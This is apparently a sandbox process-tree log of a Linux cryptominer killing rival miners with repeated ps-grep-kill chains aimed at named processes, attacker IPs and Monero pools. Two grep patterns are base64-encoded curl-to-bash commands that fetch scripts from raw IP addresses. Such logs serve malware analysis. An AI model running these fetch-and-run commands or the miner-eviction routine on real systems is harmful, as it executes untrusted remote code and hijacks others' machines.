- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1337
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1336
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:1335
- /bin/grep
  grep -v grep
  2⤵
  PID:1334
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1333
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1342
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1341
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:1340
- /bin/grep
  grep -v grep
  2⤵
  PID:1339
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1338
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1349
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:1348
- /bin/grep
  grep -v _
  2⤵
  PID:1347
- /bin/grep
  grep -v -
  2⤵
  PID:1346
- /bin/grep
  grep -v /
  2⤵
  PID:1345
- /bin/grep
  grep -v grep
  2⤵
  PID:1344
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1343
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1354
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1353
- /bin/grep
  grep "\\[^"
  2⤵
  PID:1352
- /bin/grep
  grep -v grep
  2⤵
  PID:1351
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1350
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1359
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1358
- /bin/grep
  grep rsync
  2⤵
  PID:1357
- /bin/grep
  grep -v grep
  2⤵
  PID:1356
- /bin/ps
  ps aux
  2⤵
  PID:1355
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1364
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1363
- /bin/grep
  grep watchd0g
  2⤵
  PID:1362
- /bin/grep
  grep -v grep
  2⤵
  PID:1361
- /bin/ps
  ps aux
  2⤵
  PID:1360
- /bin/grep
  grep -v grep
  2⤵
  PID:1366
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1369
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1368
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1367
- /bin/ps
  ps aux
  2⤵
  PID:1365
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1367
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1367
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1367
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1367
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1367
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1367
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1374
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1373
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  - Disables SELinux
  PID:1372
- /bin/grep
  grep -v grep
  2⤵
  PID:1371
- /bin/ps
  ps aux
  2⤵
  PID:1370
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1379
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1378
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1377
- /bin/grep
  grep -v grep
  2⤵
  PID:1376
- /bin/ps
  ps aux
  2⤵
  PID:1375
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1384
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1383
- /bin/grep
  grep gitee.com
  2⤵
  PID:1382
- /bin/grep
  grep -v grep
  2⤵
  PID:1381
- /bin/ps
  ps aux
  2⤵
  PID:1380
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1389
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1388
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1387
- /bin/grep
  grep -v grep
  2⤵
  PID:1386
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1385
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1394
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1393
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:1392
- /bin/grep
  grep -v grep
  2⤵
  PID:1391
- /bin/ps
  ps aux
  2⤵
  PID:1390
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1399
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1398
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:1397
- /bin/grep
  grep -v grep
  2⤵
  PID:1396
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1395
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1404
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1403
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:1402
- /bin/grep
  grep -v grep
  2⤵
  PID:1401
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1400
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1409
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1408
- /bin/grep
  grep kthrotlds
  2⤵
  PID:1407
- /bin/grep
  grep -v grep
  2⤵
  PID:1406
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1405
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1414
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1413
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:1412
- /bin/grep
  grep -v grep
  2⤵
  PID:1411
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1410
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1419
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1418
- /bin/grep
  grep netdns
  2⤵
  PID:1417
- /bin/grep
  grep -v grep
  2⤵
  PID:1416
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1415
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1424
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1423
- /bin/grep
  grep watchdogs
  2⤵
  PID:1422
- /bin/grep
  grep -v grep
  2⤵
  PID:1421
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1420
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1429
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1428
- /bin/grep
  grep kdevtmpfsi
  2⤵
  PID:1427
- /bin/grep
  grep -v grep
  2⤵
  PID:1426
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1425
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1434
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1433
- /bin/grep
  grep kinsing
  2⤵
  PID:1432
- /bin/grep
  grep -v grep
  2⤵
  PID:1431
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1430
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1439
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1438
- /bin/grep
  grep redis2
  2⤵
  PID:1437
- /bin/grep
  grep -v grep
  2⤵
  PID:1436
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1435
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1445
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1444
- /bin/grep
  grep " ps"
  2⤵
  PID:1443
- /bin/grep
  grep -v aux
  2⤵
  PID:1442
- /bin/grep
  grep -v grep
  2⤵
  PID:1441
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1440
- /bin/grep
  grep sync_supers
  2⤵
  PID:1448
- /bin/grep
  grep -v grep
  2⤵
  PID:1447
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1446
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1449
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1450
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1455
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1454
- /bin/grep
  grep cpuset
  2⤵
  PID:1453
- /bin/grep
  grep -v grep
  2⤵
  PID:1452
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1451
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1461
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1460
- /bin/grep
  grep "x]"
  2⤵
  PID:1459
- /bin/grep
  grep -v aux
  2⤵
  PID:1458
- /bin/grep
  grep -v grep
  2⤵
  PID:1457
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1456
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1467
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1466
- /bin/grep
  grep "sh] <"
  2⤵
  PID:1465
- /bin/grep
  grep -v aux
  2⤵
  PID:1464
- /bin/grep
  grep -v grep
  2⤵
  PID:1463
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1462
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1473
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1472
- /bin/grep
  grep " \\[]"
  2⤵
  PID:1471
- /bin/grep
  grep -v aux
  2⤵
  PID:1470
- /bin/grep
  grep -v grep
  2⤵
  PID:1469
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1468
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1478
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1477
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:1476
- /bin/grep
  grep -v grep
  2⤵
  PID:1475
- /bin/ps
  ps aux
  2⤵
  PID:1474
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1483
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1482
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:1481
- /bin/grep
  grep -v grep
  2⤵
  PID:1480
- /bin/ps
  ps aux
  2⤵
  PID:1479
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1488
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1487
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1486
- /bin/grep
  grep -v grep
  2⤵
  PID:1485
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1484
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1493
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1492
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:1491
- /bin/grep
  grep -v grep
  2⤵
  PID:1490
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1489
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1498
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1497
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:1496
- /bin/grep
  grep -v grep
  2⤵
  PID:1495
- /bin/ps
  ps aux
  2⤵
  PID:1494
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1503
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1502
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  - System Network Configuration Discovery
  PID:1501
- /bin/grep
  grep -v grep
  2⤵
  PID:1500
- /bin/ps
  ps aux
  2⤵
  PID:1499
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1508
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1507
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:1506
- /bin/grep
  grep -v grep
  2⤵
  PID:1505
- /bin/ps
  ps aux
  2⤵
  PID:1504
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1513
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1512
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:1511
- /bin/grep
  grep -v grep
  2⤵
  PID:1510
- /bin/ps
  ps aux
  2⤵
  PID:1509
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1518
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1517
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:1516
- /bin/grep
  grep -v grep
  2⤵
  PID:1515
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1514
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1523
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1522
- /bin/grep
  grep sustse
  2⤵
  PID:1521
- /bin/grep
  grep -v grep
  2⤵
  PID:1520
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1519
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1528
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1527
- /bin/grep
  grep sustse3
  2⤵
  PID:1526
- /bin/grep
  grep -v grep
  2⤵
  PID:1525
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1524
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1534
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1533
- /bin/grep
  grep wget
  2⤵
  PID:1532
- /bin/grep
  grep mr.sh
  2⤵
  PID:1531
- /bin/grep
  grep -v grep
  2⤵
  PID:1530
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1529
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1540
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1539
- /bin/grep
  grep curl
  2⤵
  PID:1538
- /bin/grep
  grep mr.sh
  2⤵
  PID:1537
- /bin/grep
  grep -v grep
  2⤵
  PID:1536
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1535
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1546
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1545
- /bin/grep
  grep wget
  2⤵
  PID:1544
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:1543
- /bin/grep
  grep -v grep
  2⤵
  PID:1542
- /bin/ps
  ps aux
  2⤵
  PID:1541
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1552
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1551
- /bin/grep
  grep curl
  2⤵
  PID:1550
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:1549
- /bin/grep
  grep -v grep
  2⤵
  PID:1548
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1547
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1558
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1557
- /bin/grep
  grep wget
  2⤵
  PID:1556
- /bin/grep
  grep cr5.sh
  2⤵
  PID:1555
- /bin/grep
  grep -v grep
  2⤵
  PID:1554
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1553
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1564
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1563
- /bin/grep
  grep curl
  2⤵
  PID:1562
- /bin/grep
  grep cr5.sh
  2⤵
  PID:1561
- /bin/grep
  grep -v grep
  2⤵
  PID:1560
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1559
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1570
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1569
- /bin/grep
  grep wget
  2⤵
  PID:1568
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:1567
- /bin/grep
  grep -v grep
  2⤵
  PID:1566
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1565
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1576
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1575
- /bin/grep
  grep curl
  2⤵
  PID:1574
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:1573
- /bin/grep
  grep -v grep
  2⤵
  PID:1572
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1571
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1581
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1580
- /bin/grep
  grep j2.conf
  2⤵
  PID:1579
- /bin/grep
  grep -v grep
  2⤵
  PID:1578
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1577
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1587
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1586
- /bin/grep
  grep wget
  2⤵
  PID:1585
- /bin/grep
  grep luk-cpu
  2⤵
  PID:1584
- /bin/grep
  grep -v grep
  2⤵
  PID:1583
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1582
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1593
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1592
- /bin/grep
  grep curl
  2⤵
  PID:1591
- /bin/grep
  grep luk-cpu
  2⤵
  PID:1590
- /bin/grep
  grep -v grep
  2⤵
  PID:1589
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1588
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1599
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1598
- /bin/grep
  grep wget
  2⤵
  PID:1597
- /bin/grep
  grep ficov
  2⤵
  PID:1596
- /bin/grep
  grep -v grep
  2⤵
  PID:1595
- /bin/ps
  ps aux
  2⤵
  PID:1594
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1605
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1604
- /bin/grep
  grep curl
  2⤵
  PID:1603
- /bin/grep
  grep ficov
  2⤵
  PID:1602
- /bin/grep
  grep -v grep
  2⤵
  PID:1601
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1600
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1611
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1610
- /bin/grep
  grep wget
  2⤵
  PID:1609
- /bin/grep
  grep he.sh
  2⤵
  PID:1608
- /bin/grep
  grep -v grep
  2⤵
  PID:1607
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1606
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1617
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1616
- /bin/grep
  grep curl
  2⤵
  PID:1615
- /bin/grep
  grep he.sh
  2⤵
  PID:1614
- /bin/grep
  grep -v grep
  2⤵
  PID:1613
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1612
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1623
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1622
- /bin/grep
  grep wget
  2⤵
  PID:1621
- /bin/grep
  grep miner.sh
  2⤵
  PID:1620
- /bin/grep
  grep -v grep
  2⤵
  PID:1619
- /bin/ps
  ps aux
  2⤵
  PID:1618
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1629
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1628
- /bin/grep
  grep curl
  2⤵
  PID:1627
- /bin/grep
  grep miner.sh
  2⤵
  PID:1626
- /bin/grep
  grep -v grep
  2⤵
  PID:1625
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1624
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1635
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1634
- /bin/grep
  grep wget
  2⤵
  PID:1633
- /bin/grep
  grep nullcrew
  2⤵
  PID:1632
- /bin/grep
  grep -v grep
  2⤵
  PID:1631
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1630
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1641
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1640
- /bin/grep
  grep curl
  2⤵
  PID:1639
- /bin/grep
  grep nullcrew
  2⤵
  PID:1638
- /bin/grep
  grep -v grep
  2⤵
  PID:1637
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1636
- /bin/grep
  grep -v grep
  2⤵
  PID:1643
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1642
- /bin/grep
  grep 107.174.47.156
  2⤵
  PID:1644
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1645
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1646
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1651
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1650
- /bin/grep
  grep 83.220.169.247
  2⤵
  PID:1649
- /bin/grep
  grep -v grep
  2⤵
  PID:1648
- /bin/ps
  ps aux
  2⤵
  PID:1647
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1656
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1655
- /bin/grep
  grep 51.38.203.146
  2⤵
  PID:1654
- /bin/grep
  grep -v grep
  2⤵
  PID:1653
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1652
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1661
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1660
- /bin/grep
  grep 144.217.45.45
  2⤵
  PID:1659
- /bin/grep
  grep -v grep
  2⤵
  PID:1658
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1657
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1666
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1665
- /bin/grep
  grep 107.174.47.181
  2⤵
  PID:1664
- /bin/grep
  grep -v grep
  2⤵
  PID:1663
- /bin/ps
  ps aux
  2⤵
  PID:1662
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1671
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1670
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:1669
- /bin/grep
  grep -v grep
  2⤵
  PID:1668
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1667
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1676
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1675
- /bin/grep
  grep mine.moneropool.com
  2⤵
  PID:1674
- /bin/grep
  grep -v grep
  2⤵
  PID:1673
- /bin/ps
  ps auxf
  2⤵
  PID:1672
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1681
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1680
- /bin/grep
  grep pool.t00ls.ru
  2⤵
  PID:1679
- /bin/grep
  grep -v grep
  2⤵
  PID:1678
- /bin/ps
  ps auxf
  2⤵
  PID:1677
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1686
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1685
- /bin/grep
  grep xmr.crypto-pool.fr:8080
  2⤵
  - Disables SELinux
  PID:1684
- /bin/grep
  grep -v grep
  2⤵
  PID:1683
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:1682
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1691
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1690
- /bin/grep
  grep xmr.crypto-pool.fr:3333
  2⤵
  PID:1689
- /bin/grep
  grep -v grep
  2⤵
  PID:1688
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:1687
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1696
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1695
- /bin/grep
  grep "[email protected]"
  2⤵
  PID:1694
- /bin/grep
  grep -v grep
  2⤵
  PID:1693
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:1692
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1701
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1700
- /bin/grep
  grep monerohash.com
  2⤵
  PID:1699
- /bin/grep
  grep -v grep
  2⤵
  PID:1698
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:1697
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1706
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1705
- /bin/grep
  grep /tmp/a7b104c270
  2⤵
  - Disables SELinux
  PID:1704
- /bin/grep
  grep -v grep
  2⤵
  PID:1703
- /bin/ps
  ps auxf
  2⤵
  PID:1702
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1711
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1710
- /bin/grep
  grep xmr.crypto-pool.fr:6666
  2⤵
  PID:1709
- /bin/grep
  grep -v grep
  2⤵
  PID:1708
- /bin/ps
  ps auxf
  2⤵
  PID:1707
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1716
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1715
- /bin/grep
  grep xmr.crypto-pool.fr:7777
  2⤵
  PID:1714
- /bin/grep
  grep -v grep
  2⤵
  PID:1713
- /bin/ps
  ps auxf
  2⤵
  PID:1712
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1721
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1720
- /bin/grep
  grep xmr.crypto-pool.fr:443
  2⤵
  PID:1719
- /bin/grep
  grep -v grep
  2⤵
  PID:1718
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:1717
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1726
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1725
- /bin/grep
  grep stratum.f2pool.com:8888
  2⤵
  PID:1724
- /bin/grep
  grep -v grep
  2⤵
  PID:1723
- /bin/ps
  ps auxf
  2⤵
  PID:1722
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1731
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1730
- /bin/grep
  grep xmrpool.eu
  2⤵
  PID:1729
- /bin/grep
  grep -v grep
  2⤵
  PID:1728
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:1727
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1736
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1735
- /bin/grep
  grep kieuanilam.me
  2⤵
  PID:1734
- /bin/grep
  grep -v grep
  2⤵
  PID:1733
- /bin/ps
  ps auxf
  2⤵
  PID:1732
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1740
- - /usr/local/sbin/kill
    kill -9 1738
    3⤵
    PID:1741
- - /usr/local/bin/kill
    kill -9 1738
    3⤵
    PID:1741
- - /usr/sbin/kill
    kill -9 1738
    3⤵
    PID:1741
- - /usr/bin/kill
    kill -9 1738
    3⤵
    PID:1741
- - /sbin/kill
    kill -9 1738
    3⤵
    PID:1741
- - /bin/kill
    kill -9 1738
    3⤵
    PID:1741
- /usr/bin/awk
